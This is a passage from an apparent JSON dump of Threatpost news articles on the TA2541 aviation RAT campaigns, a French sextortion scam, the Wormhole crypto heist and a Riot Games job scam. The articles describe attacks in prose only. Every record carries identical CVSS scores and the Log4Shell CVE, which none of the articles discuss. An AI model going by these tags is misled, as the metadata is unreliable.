Play Bitten by Sharkbot Info-stealer \u2018AV Solution\u2019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-08T16:06:29", "id": "THREATPOST:48A631F2D45804C677BB672F838F29DA", "href": "https://threatpost.com/google-play-bitten-sharkbot/179252/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:44", "description": "Researchers have identified an advanced persistent threat (APT) group responsible for a series of cyberespionage and spyware attacks against the aviation, aerospace, transportation and defense industries since at least 2017 that feature high-volume email campaigns using industry-specific lures.\n\nThe group, which researchers have dubbed TA2541, typically sends hundreds of thousands of malicious messages \u2013 nearly always in English \u2013 that ultimately deliver a remote-access trojan (RAT) payload using commodity malware to collect data from victims\u2019 machines and networks, according to [a new report](<https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight>) by Proofpoint released Tuesday. These campaigns have affected hundreds of organizations across the world, with recurring targets in North America, Europe and the Middle East, researchers said.\n\nThough a number of the group\u2019s attacks already have been tracked by various researchers \u2013 including [Microsoft](<https://twitter.com/MsftSecIntel/status/1392219299696152578>), [Mandiant](<https://www.mandiant.com/resources/dissecting-netwire-phishing-campaigns-usage-process-hollowing>), [Cisco Talos](<https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html>), [Morphisec](<https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader>) and others \u2013 since at least 2019, Proofpoint\u2019s latest research shares \u201ccomprehensive details linking public and private data under one threat activity cluster we call TA2541,\u201d researchers wrote.\n\nIndeed, previously reported attacks related to TA2541 include [a two-year spyware campaign](<https://threatpost.com/airline-credential-theft-campaign/174264/>) against the aviation industry using the AsyncRAT called Operation Layover and uncovered by Cisco Talos last September, and a [cyberespionage campaign](<blank>) against aviation targets spreading RevengeRAT or AsyncRAT revealed by Microsoft last May, among others.\n\n## **Five Years and Still Flying High**\n\nProofpoint first started tracking the actor in 2017 when its tactic of choice was to send messages with \u201cmacro-laden Microsoft Word attachments\u201d that downloaded RAT payloads. The group has since tweaked this tactic and now most frequently sends messages with links to cloud services such as Google Drive or OneDrive hosting the payload, according to the report.\n\nHowever, although the approach to how they hide their malicious payload has varied, the group has mostly remained consistent in its choice of targets, lures and the type of payloads it uses, observed Sherrod DeGrippo, vice president of Threat Research &amp; Detection at Proofpoint.\n\n\u201cWhat\u2019s noteworthy about TA2541 is how little they\u2019ve changed their approach to cybercrime over the past five years, repeatedly using the same themes, often related to aviation, aerospace, and transportation, to distribute remote access trojans,\u201d she said in an email to Threatpost. \u201cThis group is a persistent threat to targets throughout the transportation, logistics, and travel industries.\u201d\n\nIn terms of which specific RATs are used, attackers tap a variety of low-hanging fruit \u2013 that is, commodity malware that\u2019s available for purchase on criminal forums or available in open-source repositories. Currently, TA2541 prefers to drop AsyncRAT on victims\u2019 machines but also is known to use NetWire, WSH RAT and Parallax, researchers said.\n\nSo far, all of the malware distributed by the group has been aimed at information-gathering purposes and to gain remote control of an infected machine, with researchers acknowledging that they don\u2019t know the threat actor\u2019s \u201cultimate goals and objectives\u201d beyond this initial compromise, they said.\n\n## **Typical Malicious Emails**\n\nA typical malicious message in a TA2541 campaign uses a lure related to some type of logistical or transportation theme related to one of the particular industries it\u2019s targeting, researchers said.\n\n\u201cIn nearly all observed campaigns, TA2541 uses lure themes that include transportation-related terms such as flight, aircraft, fuel, yacht, charter, etc.,\u201d according to the report.\n\nFor example, researchers revealed an email that impersonated an aviation company requesting information on aircraft parts, as well as another that requested info on how to transport a medical patient on a stretcher on an ambulatory flight.\n\nOnce the COVID-19 pandemic hit in March 2020, the group shifted bait tactics slightly and \u2013 like [many other threat actors](<https://threatpost.com/spearphishing-campaign-exploits-covid-19-to-spread-lokibot-infostealer/154432/>) \u2013 adopted [COVID-related lures](<https://threatpost.com/top-email-protections-fail-covid-19-phishing/154329/>) consistent with their overall theme of cargo and flight details, researchers noted.\n\n\u201cFor example, they distributed lures associated with cargo shipments of personal protective equipment (PPE) or COVID-19 testing kits,\u201d researchers noted.\n\nHowever, this shift was short-lived, and TA2541 rather quickly returned to its more generic, transportation-related email themes, they added.\n\n## **Current Attack Vector**\n\nIn current campaigns observed by Proofpoint, if victims take the bait, they will usually be directed to click on a Google Drive URL that leads to an obfuscated Visual Basic Script (VBS) file, researchers said.\n\n\u201cIf executed, PowerShell pulls an executable from a text file hosted on various platforms such as Pastetext, Sharetext, and GitHub,\u201d researchers wrote. \u201cThe threat actor executes PowerShell into various Windows processes and queries Windows Management Instrumentation (WMI) for security products such as antivirus and firewall software, and attempts to disable built-in security protections.\u201d\n\nIn this way, TA2541 collects system information before then downloading the RAT on the host machine, according to the report.\n\nGoogle Drive has been a consistent tool of the threat group, but occasionally TA2541 also will use OneDrive to host the malicious VBS files, researchers said. In late 2021, Proofpoint also observed the group using DiscordApp URLs that link to a compressed file that led to either AgentTesla or Imminent Monitor as an attack vector, researchers said. Indeed, the Discord content delivery network (CDN) has been [an increasingly popular way](<https://threatpost.com/attackers-discord-slack-malware/165295/>) for threat actors to use a legitimate and popular app for nefarious purposes.\n\nOccasionally TA2541 also will use email attachments instead of cloud-based service links, including compressed executables such as RAR attachments with an embedded executable containing URL to CDNs hosting the malware payload, they added.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T14:02:07", "type": "threatpost", "title": "TA2541: APT Has Been Shooting RATs at Aviation for Years", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T14:02:07", "id": "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "href": "https://threatpost.com/ta2541-apt-rats-aviation/178422/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T17:30:25", "description": "A new French-language [sextortion campaign](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>) is making the rounds, researchers warn.\n\nAs noted by Sophos researchers in a Monday [report](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>), sextortion is one of the oldest tricks in the book, but its popularity has waned in recent years due to effective cybersecurity, law enforcement crackdowns and the rise of ransomware.\n\nThis new campaign is one signal of what may be a resurgence, they said.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\n## Threats Sandwich Malware Links\n\nThe new French-language attack entails a blind email blast, shown below, with unsubstantiated claims of video evidence and so on. It cites France\u2019s legal penalties for watching illegal pornography, then tells the reader: \u201cIf you wish, you may reply to the address below to explain away your actions, so that we can evaluate your explanation and determine if charges should be brought. You have a strict deadline of 72 hours.\u201d\n\nShould the reader not comply, \u201cwe will are [sic] obliged to send our report to the Public Prosecutor to issue an arrest warrant against you. We will proceed to have you arrested by the police closest to your place of residence.\u201d\n\nNotably, the malicious email contains no plaintext or hyperlinks. Instead, its text is displayed in an image file.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/23114449/French-sextortion-threat-email-e1645634734663.png>)\n\nFrench-language sextortion threat email. Source: Sophos.\n\nAttackers use hyperlinks to trick unwitting victims into downloading malware or visiting malicious webpages. As Sophos explains, \u201cAdding an image that holds the call-to-action text obviously makes it harder for a recipient to reply, because a plain image can\u2019t contain clickable links, or even text that can be copied and pasted.\u201d\n\nBut, as Mike Parkin \u2013 senior technical engineer at Vulcan Cyber \u2013 told Threatpost via email, \u201cThe fact that most scams end up in our junk mail folder shows how effective email filters have become, which is why they look to alternative methods like embedded PDFs or images rather than raw text or HTML that is easy for the filters to analyze.\u201d\n\n## What is Sextortion?\n\nSextortion is a form of blackmail in which a malicious actor claims to possess evidence of sexual misbehavior from their victim. The attacker demands payment in exchange for not spreading the compromising information or images.\n\nSometimes, these campaigns can combine with [botnets](<https://threatpost.com/phorpiex-botnet-shifts-ransomware-sextortion/149295/>), [ransomware](<https://threatpost.com/sextortion-emails-force-payment-via-gandcrab-ransomware/139753/>) and other methods of cyber attack to form a potent cocktail. However, as [prior](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) [attacks](<https://threatpost.com/sextortionists-defenses-cryptocurrency-shift/148967/>) have shown, sextortion tends to be rudimentary: Such attacks aren\u2019t targeted. Rather, they entail blind email blasts that prey on victims\u2019 fear, without any actual evidence of sexual impropriety to back them up.\n\n## Sextortion is on the Rise Again\n\n\u201cScams seem to run in cycles,\u201d notes Parkin. \u201cWhether it\u2019s a Prince from Nigeria, uncollected assets, scam victim compensation, extortion over adult websites you didn\u2019t visit, or whatever. Scammers will use one for a while, then shift to something else when they stop getting responses. Eventually, they\u2019ll circle back to an old scam that may have been updated with new text or a new graphic.\u201d\n\nLionel Sigal, CTI at CYE, told Threatpost via email that sextortion has recently been skyrocketing; \u201cSextortion attempts (real and fake) targeting executives of organizations have increased by 800% in the last 4 months,\u201d he said.\n\nCampaigns targeting ordinary individuals are also spiking: The FBI\u2019s Internet Crime Complaint Center received more than [16,000 sextortion complaints](<https://www.ic3.gov/Media/Y2021/PSA210902>) in only the first seven months of 2021.\n\nWill this old-hat method of cyber attack prove effective? \u201cIt\u2019s too early to tell what the hit rate is on this technique,\u201d Casey Ellis, Founder and CTO of Bugcrowd, told Threatpost via email, \u201cbut it feels to me like a pivot that people would fall for. If a scam has a take of $500 and it costs 1 cent to send an email, you only have to connect 1 in 50,000 times for the scam to break even.\u201d\n\nTo Parkin, \u201cthe best defense is solid user education. No matter how successful an attacker is at getting past the filters, their attack can only succeed if the target falls for it and takes the bait.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-23T17:20:41", "type": "threatpost", "title": "Sextortion Rears Its Ugly Head Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-23T17:20:41", "id": "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "href": "https://threatpost.com/sextortion-rears-its-ugly-head-again/178595/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Wormhole \u2013 a web-based blockchain \u201cbridge\u201d that enables users to convert cryptocurrencies \u2013 said on Thursday that \u201call funds are safe\u201d after attackers abused a vulnerability to shake it down for 120,000 Ethereum (approximately $314 million).\n\nIn a postmortem shared with Threatpost on Thursday, blockchain security and smart-auditing company CertiK said that its preliminary analysis indicates that \u201cthe attacker exploited a mint function on the Solana side of the Wormhole bridge to create 120,000 wETH [wrapped Ethereum] for themselves, then used these minted tokens to claim ETH that was held on the Ethereum side of the bridge.\u201d\n\nAs far as negotiation attempts go, CertiK said that the Wormhole team left a message to the attacker stating, \u201cWe noticed you were able to exploit the Solana VAA verification and mint tokens. We\u2019d like to offer you a white-hat agreement, and present you a bug bounty of $10 million for exploit details, and return the wETH you\u2019ve minted. You can reach out to us at[ contact@certus.one](<https://t.nylas.com/t1/222/6go6zh11n354zj4gtfyydtk2j/0/7e3f0565dba6ac71abf6ccdb740c5697cd8db828b0852af88c0c054ee28bb3c2>).\u201d\n\nIts total on the heist differs a bit from that of Wormhole: CertiK\u2019s analysis showed that the attacker got away with 93,750 ETH ($251 million), 432,662 SOL ($46.6 million) and 4.14 million in USD Coin (USDC) ($4.14 million), for a total of $302,495,717.\n\nThis is the [second-largest hack](<https://defiyield.app/rekt-database>) of a decentralized finance (DeFi) platform, second only to the Poly Network (ETH) exploit, in which an attacker ripped off about $602 million. That attacker reportedly went on to [pay it back](<https://threatpost.com/poly-network-recoups-610m-stolen-from-defi-platform/168906/>), however, after accepting a gig as chief security advisor with Poly Network.\n\nIn an early-morning [tweet](<https://twitter.com/wormholecrypto/status/1489233259808571401>) on Thursday, the official Wormhole Twitter account confirmed that it had been raided for 120,000 ETH, but that the vulnerability is now patched.\n\n> 1/2\n> \n> All funds have been restored and Wormhole is back up.\n> \n> We're deeply grateful for your support and thank you for your patience.\n> \n> \u2014 Wormhole\ud83c\udf2a (@wormholecrypto) [February 3, 2022](<https://twitter.com/wormholecrypto/status/1489232008521859079?ref_src=twsrc%5Etfw>)\n\nWormhole\u2019s Portal \u2013 its token bridge \u2013 was back up as of 13:29 UTC, the team said.\n\n## A \u2018Rather Common\u2019 Programming Error\n\nRoger Grimes, data driven defense evangelist for KnowBe4, told Threatpost on Thursday that the attack was successful because of what he called a \u201crather common\u201d programming error.\n\n\u201cThe function inside of the multiple nested smart contracts which was supposed to verify the signature was not coded to ensure the integrity check actually happened,\u201d he exlained via email. \u201cSo there was no integrity guaranteed in the integrity check. Yeah, that is a problem.\u201d\n\n## Why So Popular?\n\nCertiK said that the bridge\u2019s popularity meant that it had become the dominant bridge between Solana and Ethereum, \u201cand as such was responsible for a large proportion of all wrapped Ethereum on the Solana blockchain.\u201d\n\n020322 14:54 UPDATE: Added CertiK\u2019s analysis of Wormhole\u2019s 1:1 ratio of ETH to wETH. \n\nAs CertiK explained in its postmortem, the bridge held a 1:1 ratio of ETH to wETH, \u201cacting essentially as an escrow service.\u201d But the theft broke that 1:1 peg, leading to what CertiK said was \u201cat least 93,750 less ETH held as collateral.\u201d\n\nIt didn\u2019t bode well for the financial health of Solana, the firm pointed out. If that ratio hadn\u2019t been regained, DeFi on Solana was at risk of \u201ca mass liquidation event,\u201d according to the its analysis.\n\nBut given that Wormhole on Thursday indicated that its backers \u2013 whoever they may be \u2013 had put up the funds necessary to return the peg to a 1:1 backing, the collateralization of wETH on Solana was restored. \n\nAll well and good, but still, investors\u2019 gonads shrunk in response to the massive heist: The price of Solana, which outpaced both Bitcoin and Ethereum last year, was in [freefall](<https://www.forbes.com/sites/billybambrough/2022/02/03/crypto-price-alert-ethereum-rival-solana-suddenly-in-free-fall-after-huge-325-million-hack/?sh=442f39b04bb5>) Thursday morning. It was selling at $97.69 as of 12:50 ET, down 10 percent since the details of the theft were revealed. Solana had hit a high of $260 in November 2021. Ethereum is also giving investors the hives, having dropped about 5 percent as of the same time on Thursday.\n\nAt this point, the full extent of this attack \u201cstill remains to be seen,\u201d CertiK said. It could turn out to be a precursor to other attacks, the firm suggested, if, for example, Wormhole\u2019s bridge to a different cryptocurrency \u2013 the Terra blockchain \u2013 shares the same vulnerability as its Solana bridge.\n\n## Who Bailed Out Wormhole?\n\nThe Wormhole team didn\u2019t specify who dug into what must be some seriously deep pockets to back-fill all that money. The Twitterverse, of course, had hypotheses, including that perhaps it was Alameda Research: a cryptocurrency quantitative trading firm and liquidity provider that claims to \u201cmanage over $70 million in digital assets and trade around $1 billion per day across thousands of products: all major coins and altcoins, and their derivatives.\u201d\n\n\u201cIt was either dilute their equity to infinity with $300 million bail out or watch all of Solana ecosystem crash and burn (which would have costed Alameda more than $300 million on their books),\u201d suggested one Twitter user.\n\n> Alameda probably bailed them out, it was either dilute their equity to infinity with $300 million bail out or watch all of Solana ecosystem crash and burn (which would have costed Alameda more than $300 million on their books)\n> \n> \u2014 ichioku (@1chioku) [February 3, 2022](<https://twitter.com/1chioku/status/1489240858017021956?ref_src=twsrc%5Etfw>)\n\nAlameda hasn\u2019t made a public statement on the matter. Wormhole has promised a detailed incident report as soon as possible.\n\n## Crypto\u2019s Cutting Edge Gets a Nasty Cut\n\nRonghui Gu, co-founder and professor of CertiK, told Threatpost on Thursday that clearly this Wormhole exploit isn\u2019t the first of its kind, and obviously, it won\u2019t be the last.\n\n\u201cWe saw another cross-chain bridge exploited less than a week ago, when Qubit Finance lost $80 million,\u201d Gu pointed out, referring to an attack [confirmed](<https://blockworks.co/defi-protocol-qubit-finance-loses-80m-in-hack/#:~:text=Hackers%20have%20stolen%20%2480%20million,ever%2C%20DeFiYield%20Rekt%20data%20shows.>) by the DeFi protocol Qubit Finance on Friday.\n\nThe attackers reportedly made off with 206,809 Binance coins through Qubit\u2019s QBridge deposit function, making it the seventh-largest DeFi hack ever.\n\nExpect more of the same when it comes to bridge exploits, Gu said, given insatiable demand for these technologies. \u201cWe seem to be at an awkward point where the demand for cross-chain infrastructure is far outpacing the industry\u2019s ability to build services securely,\u201d he told Threatpost via email.\n\nOf course, there\u2019s always the \u201cbecause that\u2019s where the money is\u201d rationale, Gu noted: \u201cBridges are an attractive target for hackers: they hold millions of dollars of tokens in what is essentially an escrow contract, and by operating across multiple chains they multiply their potential points of failure.\u201d\n\nThreat actors follow the money, he said, and those on the cutting edge of cryptocurrency technology can get bumped off as a result: \u201cA lot of money goes to the newest, most exciting ecosystems. The price that the most adventurous DeFi explorers pay is a heightened risk of falling victim to these exploits of innovative but ultimately insecure platforms.\u201d\n\n## A Need for Secure Development Lifecycle\n\nWhere there is software, there are bugs. Grimes pointed to the attack as being a case in point about the need for training in secure development lifecycle (SDL) coding. \u201cSDL teaches developers about common exploitable bugs and how to avoid putting it into their own code,\u201d he explained. \u201cIt teaches about using bug checking tools, using coding tools that automatically rule out as many security bugs as they can, and in general, puts security into the whole lifecycle of developing something, be it a traditional program, smart phone app or smart contract.\u201d\n\nBut there\u2019s a bigger underlying problem, he noted: Namely, most developers and smart contract creators, aren\u2019t trained in SDL and \u201cget little to no training in secure development. So, these sorts of bugs are going to creep in and bad actors are going to take advantage of them.\u201d\n\nOne thing to note is that the cryptocurrency world is full of trillions of dollars, but it\u2019s still at the toddler stage. \u201cIt is an immature industry using immature code, and like all new industries, it is moving ahead at warp speed, good security be damned,\u201d Grimes said.\n\nWhereas it\u2019s getting harder for bad actors and bug hunters to find really good exploits in Microsoft Windows, Macs, Linux and Google ChromeOS, these platforms are maturing, making it tougher to pull them apart, he said. That includes the experienced coders, tools and the protective mechanisms of the operating systems themselves.\n\nNot so with the cryptocurrency world, Grimes said, which is the mirror opposite.\n\n\u201cIt is built on very secure protocols and algorithms, but then a lot of very immature and buggy applications are built on top of it,\u201d he observed.\n\nHe compared it to putting your door key in your potted plant in front of the door: \u201cSometimes all a thief has to do is look. And that is what hackers exploiting cryptocurrency are doing. They are taking their traditional methods for hunting bugs and using them against immature cryptocurrency applications. And viola, they are finding lots of exploitable bugs.\u201d\n\nAnd once the money\u2019s gone bye-bye, it\u2019s tough to claw it back. \u201cThe exploits always result in stolen money, which are hard to track to and [identify], and almost always impossible to reverse, even if you are watching it in real time,\u201d Grimes said.\n\nHe predicted that after suffering billions of dollars in pain, the cryptocurrency world \u201cwill mature and it will become harder for hackers to find the easy pickings.\u201d\n\nToo bad the lessons are so painful, Grimes said: \u201cYou always hope that when the next cool digital thing happens that we will better apply the security lessons learned from the previous platforms. But we always seem to want there to be more digital blood on the ground than there needs to be. We always, over and over, want to learn the hard way. Each new computing platform is like we have learned nothing at all.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-03T18:28:14", "type": "threatpost", "title": "Wormhole Crypto Platform: 'Funds Are Safe' After $314M Heist", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-03T18:28:14", "id": "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "href": "https://threatpost.com/wormhole-crypto-funds-safe-heist/178189/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:22", "description": "Riot Games, the developer behind League of Legends, has filed a California lawsuit against scammers, whose identities aren\u2019t yet known, for ripping off job seekers with the promise of a gig with the company.\n\nUsually early in their careers and eager for a chance with a gaming company like Riot, job hunters are either targeted by a cybercriminal posing as a recruiter or with fake ads on popular employment sites like Indeed, Riot\u2019s filing explained.\n\nThis email submitted as part of Riot\u2019s lawsuit includes a fake listing for a video game artist/illustrator.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10134745/riot-fraud-email-job-opening-.png>)\n\nSource:\n\nThen, the applicant is run through an imaginary interview process with questions that seem legit, like, \u201cWhy do you want to work at Riot Games?\u201d and, \u201cHonestly describe what kind of working conditions you thrive in.\u201d\n\nThe interview would often be conducted by chat and followed by a quick job offer.\n\nTo make things extra convincing, the fraudsters used contacts and other communications doctored-up with Riot branding, including convincing looking employment contracts.\n\nAfter the interview, there\u2019s just one step left for the interviewee \u2014 they are asked to send money for \u201cwork equipment\u201d like an iPad, which the interviewer assures the new hire will be refunded. Spoiler: they aren\u2019t going to be.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10135006/riot-text-ask-for-money.png>)\n\nSource: Polygon.\n\nRiot included copies of checks sent to the fraudsters by victims in its complaint, ranging from $2,400 to $4,300.\n\nRiot wasn\u2019t the only prominent gaming company used to lure in victims, Polygon reportedly heard from people approached by fake representatives of Rockstar Games and Manticore Games, according to its report.\n\n\u201c[The scam] is absolutely appalling,\u201d Riot\u2019s lawyers wrote in the complaint. \u201cTheir victims largely are young, na\u00efve, and want nothing more than to work for Riot, one of the most prestigious video-game companies in the world. Defendants prey on the hopes and dreams of these individuals in order to steal their identities and pillage their bank accounts.\u201d\n\nRiot Games representatives said in an interview with Polygon that the company isn\u2019t exactly sure how many people have already been [victimized by the phishing campaign](<https://www.polygon.com/22822273/riot-games-job-recruiting-scam-lawsuit>).\n\n## **Gamers and \u2018Dynamite Phishing\u2019 **\n\nPhishing lure themes are fickle, and ebb and flow with the latest headlines. COVID-19, [Chipotle offers](<https://threatpost.com/chipotle-serves-up-lures/168279/>), easy [infrastructure legislation money](<https://threatpost.com/attackers-impersonate-dot-phishing-scam/169484/>), and now, dream gaming jobs, are all bait intended to illicit an emotional reaction and make otherwise rational people take action without thinking it through.\n\nLast summer, the Threat Intelligence Team at GreatHorn discovered a rise in business email compromise (BEC) attacks that sent X-rated material to people at work to try and trigger an emotional response, something the report called \u201cdynamite phishing.\u201d\n\n\u201cIt doesn\u2019t always involve explicit material, but the goal is to put the user off balance, frightened \u2013 any excited emotional state \u2013 to decrease the brain\u2019s ability to make rational decisions,\u201d according to the report.\n\nA fantasy job at a huge gaming company could certainly trigger a highly emotional response in the right person.\n\nThis fake gaming company job scam leverages both the co-called [Great Resignation](<https://hbr.org/2021/09/who-is-driving-the-great-resignation>) of 2021, which saw record-breaking numbers of workers looking for better gigs, as well as the [pandemic push to work-from-home](<https://threatpost.com/2020-work-for-home-shift-learned/162595/>). Now a call from a personal cell phone number, or a Zoom interview in someone\u2019s kitchen, doesn\u2019t seem all that unusual and fraudsters are taking advantage.\n\nGaming itself is under relentless attack. Last summer, Akamai Technologies found [attacks on gaming](<https://threatpost.com/attackers-gaming-industry/167183/>) web applications alone jumped by a staggering 340 percent in 2020.\n\nFrom [Grinchbots](<https://threatpost.com/pandemic-grinchbots-surge-activity/176898/>) scooping up vast swaths of the latest hardware inventory to last month\u2019s [back-to-back PlayStation 5 breaches](<https://threatpost.com/playstation-5-hacks-same-day/176240/>) and [malicious gaming apps](<https://threatpost.com/9m-androids-malware-games-huawei-appgallery/176581/>) lurking in marketplaces, this latest fake job fraud is just another way criminals are trying to exploit the enthusiasm of gamers.\n\nNow Riot hopes to use this lawsuit as a way to track down the cybercriminals and make it clear the company was not behind the scam, according to Riot attorney Dan Nabel.\n\n\u201cWe\u2019re upset that people who viewed Riot as their dream company, even if that\u2019s one person, had been defrauded through this scam,\u201d Nabel told Polygon. \u201cSecondarily, we felt a need to protect our employees who are having their identities impersonated.\u201d\n\n_**There\u2019s a sea of unstructured data on the internet relating to the latest security threats. **_[**_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This **_[**_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_**, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken.**_\n\n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T19:00:36", "type": 